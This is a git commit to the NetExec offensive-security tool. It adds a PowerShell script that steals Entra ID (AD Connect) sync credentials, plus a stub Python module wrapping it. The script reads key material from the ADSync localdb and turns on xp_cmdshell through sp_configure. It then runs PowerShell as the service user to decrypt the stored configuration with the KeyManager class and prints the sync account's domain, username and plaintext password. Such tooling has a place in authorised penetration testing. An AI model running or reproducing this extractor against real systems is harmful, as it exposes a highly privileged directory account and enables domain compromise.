Init module to extract entry id sync credentials

NeffIsBack · NeffIsBack · commit 8415e2569801 · 2025-06-29T11:43:47.000-04:00
diff --git a/nxc/data/entry-sync-creds/entry-sync-creds.ps1 b/nxc/data/entry-sync-creds/entry-sync-creds.ps1
@@ -0,0 +1,67 @@
+Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
+Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
+
+$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
+
+try {
+    $client.Open()
+} catch {
+    Write-Host "[!] Could not connect to localdb..."
+    return
+}
+
+Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
+
+$cmd = $client.CreateCommand()
+$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
+$reader = $cmd.ExecuteReader()
+if ($reader.Read() -ne $true) {
+    Write-Host "[!] Error querying mms_server_configuration"
+    return
+}
+
+$key_id = $reader.GetInt32(0)
+$instance_id = $reader.GetGuid(1)
+$entropy = $reader.GetGuid(2)
+$reader.Close()
+
+Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
+
+$cmd = $client.CreateCommand()
+$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
+$reader = $cmd.ExecuteReader()
+if ($reader.Read() -ne $true) {
+    Write-Host "[!] Error querying mms_management_agent"
+    return
+}
+
+$config = $reader.GetString(0)
+$crypted = $reader.GetString(1)
+$reader.Close()
+
+Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
+
+$cmd = $client.CreateCommand()
+$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
+$reader = $cmd.ExecuteReader()
+
+$decrypted = [string]::Empty
+
+while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
+    $decrypted += $reader.GetString(0)
+}
+
+if ($decrypted -eq [string]::Empty) {
+    Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
+    return
+}
+
+$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
+$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
+$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+
+Write-Host "[*] Credentials incoming...`n"
+
+Write-Host "Domain: $($domain.Domain)"
+Write-Host "Username: $($username.Username)"
+Write-Host "Password: $($password.Password)"
diff --git a/nxc/modules/entra-sync-creds.py b/nxc/modules/entra-sync-creds.py
@@ -0,0 +1,25 @@
+
+class NXCModule:
+    """
+    Example:
+    -------
+    Module by @yomama
+    """
+
+    name = "entra-sync-creds"
+    description = "Extract Entra ID sync credentials from the target host"
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def __init__(self):
+        self.context = None
+        self.module_options = None
+
+    def options(self, context, module_options):
+        """Required.
+        Module options get parsed here. Additionally, put the modules usage here as well
+        """
+
+    def on_admin_login(self, context, connection):
+        self.context = context
